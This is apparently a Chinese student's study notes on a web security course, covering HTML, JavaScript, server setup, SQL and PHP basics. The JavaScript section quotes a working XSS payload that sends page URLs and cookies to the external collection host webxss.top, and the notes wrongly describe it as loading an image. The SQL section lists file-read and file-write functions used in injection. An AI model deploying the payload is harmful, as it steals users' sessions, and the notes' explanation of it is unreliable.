网易云课堂Web安全工程师课程分享——第二章 Web开发基础知识
第一节 前端开发基础——HTML
课程回顾
- Web页面通常使用哪几种语言开发?
- HTML结构包含哪两部分?
- HTML元素由哪几部分组成?
- 常见的HTML标签有哪些?
- HTML DOM是什么结构?
总结回答
- HTML + CSS + Java Script
- Head 和 Body
- 开始标签(例如<P>),闭合标签(例如</p>), 内容,属性
标签 | 表示 |
---|---|
注释 | <!-- --> |
图像 | <img src=’’ > |
链接 | <a href=’’> |
表单 | <form> </form> |
内联框架 | <iframe src=’’> </iframe > |
HTML DOM
参考资料
初级
测验
完成测验实践
完成实践中的“HTML实例”;在运行实验代码时,需要了解其含义,并尝试修改每一个实例相关的元素(标签、属性、内容)。了解HTML实体
http://www.runoob.com/html/html-entities.html
http://www.runoob.com/tags/ref-entities.html掌握HTML预留字符
字符 | 实体编码 | 实体名称 |
---|---|---|
< | < | < |
> | > | > |
" | " | " |
’ | &apos | ' |
& | & | & |
高级
- 熟悉HTML的常见事件属性
了解on属性,参考其中的属性亲自试一试,让如onerror、onload、onclick、onchange、onfocus、oninput、onmousemove、onsubmit、onkeydown属性执行alert(1)。
课程作业
创建你的第一个html网页,
包含内容:
网页标题<title>: 我的第一个HTML网页
使用<img>加载素材:
http://edu-image.nosdn.127.net/FBEFFDA6D0AA8FE868373CB4FE111DDA.png imageView&thumbnail=1920y560&quality=100(width=“480” height=“150”)
使用<img>加载学员云课堂头像(width=“50” height=“50”);
并内联一个包含云课堂的框架(width=“500” height=“100”)。可试用换行符。
并通过浏览器访问。将html代码文件和浏览器显示的内容截图贴到答题框内。
第二节 前端开发基础——javascript
课程回顾
- 我们在哪几个地方可以运行javascript?
- javascript如何获取元素和元素内容?
- javascript如何获取浏览器cookie?
- javascript由哪三部分组成?
总结回答
- HTML的<script>和</script>之间,HTML的事件属性中(如onclick)以及浏览器的控制台。
- 获取元素:getElementById()
获取元素内容:.innerHTML
alert()在javascript中表示弹出一个警告框,用来展示信息。 - 获取浏览器cookie:document.cookie
- ECMCScript:javascript标准
DOM 文档对象模型,HTML元素操作
BOM 浏览器对象模型,浏览器操作
参考资料
初级
- 测验
完成测验 - 实践
完成实例 - 掌握javaScript的全局函数
掌握 - 实用扩展
使用js格式化工具格式化如下代码,并理解每一句:
(function(){(new Image()).src='http://webxss.top/xss/index.php?do=api&id=Sx5tnh&location='+
escape((function(){try{return document.location.href}catch(e){return ''}})())+
'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+
'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+
'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();
keep.src='http://webxss.top/xss/index.php?
do=keepsession&id=Sx5tnh&url='+escape(document.location)+'&cookie='+escape(document.cookie)}
大概是获取webxss平台的登录主页图片…
高级
- 框架扩展
搜集整理常见的JavaScript框架,了解如何使用; - 掌握JSONP
1)熟悉json格式,参考;
2)学习jsonp格式,参考;
3)在学习1.2.3后, 将上述JSONP教程中的代码部署并实验jsonp如何跨域读取数据。 - 掌握AJAX技术
参考实践。
课程作业
- 如下为一个html的元素:
<p id=“hello”>Hello World!</p>
如果想用javascript语言获取该元素内容,并将元素内容输出在浏览器页面上。则相关javascript代码如何写(不用全部写出,只写出关键的代码即可)。
回答:document.write(document.getElementById(“hello”).innerHTML); - 获取study.163.com的cookie并弹框显示。
alert(document.cookie);
第三节 WEB服务端环境
课程回顾
- WEB动态页面大致解析过程是什么?
- WEB服务端包含哪两种服务?
- 本地访问时,四种访问网站的形式有哪些?
- 如何运行一个简单的WEB文件?
总结回答
1.动态页面解析
- Web服务(Apache)和数据库服务(MySQL)。
- 本地主机,127.0.0.1,本机IP,域名访问
- 新建文档到当前目录下,在浏览器中输入路径即可访问。
参考资料
初级
- 了解参加的Web服务架构
1)搜集流行的Web服务端架构:
2)整理了解这些Web构架的特点。 - 安装xampp
不是很麻烦这里就不详细介绍了
高级
- 安装tomcat环境,在网站目录下新建一个测试页面index.jsp
内容为:
<html><head><title>My first Tomcat!</title></head><body><center>Now time is:<%=new java.util.Date()%></center></body>
</html>
要求正常显示页面。
经过我一顿操作之后,页面显示如下
这里比较坑的是设置环境变量的时候直接复制了路径,千万不要复制! 千万不要复制!
- 尝试部署初级扩展中提到的几种Web架构。
有心杀贼无力回天啊兄弟们。如果有兴趣自己部署一下吧。
课程作业
安装phpstudy,并配置hosts为:127.0.0.1 websecurity.163.com;并访问该域名。在答题框内给出成功访问该网站的截图(包含地址栏)。
第四节 后端开发基础——SQL
课程回顾
- 如何才能创建一个数据库、表?
- 如何对表中数据进行增删改查?
- Mysql常见的内置函数有哪些?
总结回答
- 创建数据库:CREATE DATABASE NAME;
创建数据表:CREATE TABLE NAME(DES); - 增:INSERT INTO TABLE() VALUE();
删:DELETE FROM TABLE WHERE DES;
改:UPDATE table SET DES WHERE DES;
查:SELECT DES FROM TABLE; - select database();
select current_user;
select load_file();
select version();
select into+outfile;
参考资料
- 收集常见的数据库类型
参考。 - 测验
完成测验。 - 掌握phpmyadmin的基本操作
增删查改。 - 学习函数
掌握concat()、group_concat()、concat_ws()、load_file()、hex()、char()、count()、substring()、into+outfile、LOAD DATA INFIL、limit。
课程作业
作业时两个课上操作过的示范,这里就不重复了。
第五节 后端开发基础——PHP
课程回顾
- 什么是PHP?基本语法是什么?
- PHP变量$_POST, $_GET, $_FILES的用法。
- PHP include的用法?
- PHP如何操作数据库?
总结回答
- PHP:Hypertext Preprocessor,超文本预处理器,是一种开源的通用计算机脚本语言,尤其适用于网络开发并可嵌入HTML中使用。 基本语法:<?php ?>,注释
#
,//
,/* */
,echo
和print
,串接.
,函数名function()
,变量名$
。 - 都可用来传递值。
- <?php include "" ?>
课程作业
视频中讲解的部分。
网易云课堂Web安全工程师课程分享——第二章 Web开发基础知识相关推荐
- 网易云课堂Web安全工程师课程分享——第一章 Web介绍
第一节 Web介绍 课程回顾: Web是什么? Web发展分为哪几个阶段? Web安全问题发展形势? Web的工作流程? 浏览器是如何工作的? 总结回答: Web指的是World Wide Web,平 ...
- 网易云课堂[Web安全工程师]第一部分 第二章WEB简介 学习记录
[仍旧写在前面 个人学习笔记] 第一部分 WEB基础知识 第二章 WEB基础知识 第一节 前端开发基础--HTML课后小测验 1 HTML页面的注释符号是那种?<!-- --> 2 若要在 ...
- 网易云课堂Java入门视频课程
课程概述 本课程不提供教学服务.作业批改及证书发放. 程序设计是一门基础课程.对于计算机相关专业而言,程序设计是专业基础知识,是进一步学习其他专业知识的第一步阶梯:对于非计算机专业而言,程序设计的学习 ...
- 网易云Web安全工程师课程分享2——第二章 常见Web漏洞解析
第一节 XSS漏洞 课程回顾 什么是XSS? XSS分类 XSS演示 总结回答 XSS: Cross Site Script,跨站脚本. 危害:盗取用户信息,钓鱼,制造蠕虫等. XSS类型 方式 存储 ...
- 【web前端初级课程】第二章 CSS层叠样式表
目录 一.使用CSS的方法 二.CSS的选择器 三.CSS的常见样式 四.相关练习 一.使用CSS的方法 (一)行内样式 在标签的style属性中写CSS代码. (二)页面样式 在head标签中添加s ...
- 网易云课堂解析_网易云课堂课程下载教程
网易云课堂不能下载视频,缓存打不开? 记: 网易云课堂.中国大学mooc这些学习平台确实大大方便了我们这些工作党学习,之前一直用的是手机客户端看视频,但是由于换手机啊,清理垃圾啊,手机储存容量各种原因 ...
- 网易云计算机专业课程,网易云课堂“计算机专业课程”开课
在线教育的崛起让更多网民体验到了通过互联网来学习知识的乐趣,但是这种学习方式到底能发展到哪一步,是否会触及到线下传统的教学模式呢?上周国内领先的在线教育平台网易云课堂的"计算机专业课程&qu ...
- 百度传课网易云课堂在线教育平台竞品分析【转】
最近正在用网易云课堂学习数据库,闲来搜到这篇网易云课堂和百度传课的竞品分析,写的不错. 个人还是网易云课堂用的比较多,网易云课堂总体给人感觉讲师更专业靠谱,并且注重知识体系的培养,比如课程体系和微专业 ...
- 网易云课堂微专业--Java高级开发工程师
获取方式:公众号:文若课堂 5.微专业-java | |──大纲.jpg 910.32KB | |──阶段1:高性能编程专题 | | |──1.1.1 J ...
最新文章
- UVA 10306 e-Coins(全然背包: 二维限制条件)
- matlab中conv滤波,其中是Matlab(imfilter)和TensorFlow中偶数滤波器(6x6)的中心像素(转速表nn.conv2d)?...
- MySQL命令之show用法详解
- java开启新线程的三种方法
- python创建数组与列表_python基础(三):数组和列表
- 【专栏必读】王道考研408计算机组成原理万字笔记和题目题型总结(从学生角度辅助大家理解):各章节导航及思维导图
- C#空接合操作符——??
- 不只有BERT!盘点2018年NLP令人激动的10大想法
- 用python画圣诞树-Python――画一棵漂亮的樱花树(不同种樱花+玫瑰+圣诞树喔)...
- 东软是如何看待“人与资产”管理的转型
- iOS 谁说程序猿不懂浪漫之 爱心
- android VideoPlayer原生播放方式
- 怎么把matlab的背景改成白色背景图片,如何把图片背景换成白色?
- 添加页面报警闪烁效果
- mysql 备份数据库
- 上瘾读书笔记:让用户养成使用习惯的四大产品逻辑
- 四年级计算机课的检讨,四年级下册信息技术教学反思.doc
- 春季早晚温差大,提醒您注意及时加减衣服——附“感冒食疗方”若干,供收藏。
- 让靠谱的人推荐靠谱的人:基于关系链计算的职场社交应用“脉脉”,上线“好友推荐候选人”功能
- 云帆文档管理系统版本更新说明:v4.6.0
热门文章
- Python 黑马程序员 笔记
- BasicDBObject 和Query 查询mongodb不同使用方式
- 计算机毕业设计ssm社区爱心活动网站be83l系统+程序+源码+lw+远程部署
- 魅族设置语音录音服务器,魅族手机留言录音功能使用方法介绍
- //利用 DirectoryInfo递归遍历文件夹,删除所有文件,文件夹
- 2015年医学核心期刊目录(有效期自2014年)
- 手把手教你如何写一个三子棋/N子棋的小游戏
- 【sql server】已更新或删除的行值要么不能使该行成为唯一行,要么改变了多个行 解决方法总结
- SQL——-已更新或删除的行值要么不能使该行成为唯一行,要么改变了多个行
- 曙光LINUX是什么系统,国产操作系统的曙光----深度操作系统Deepin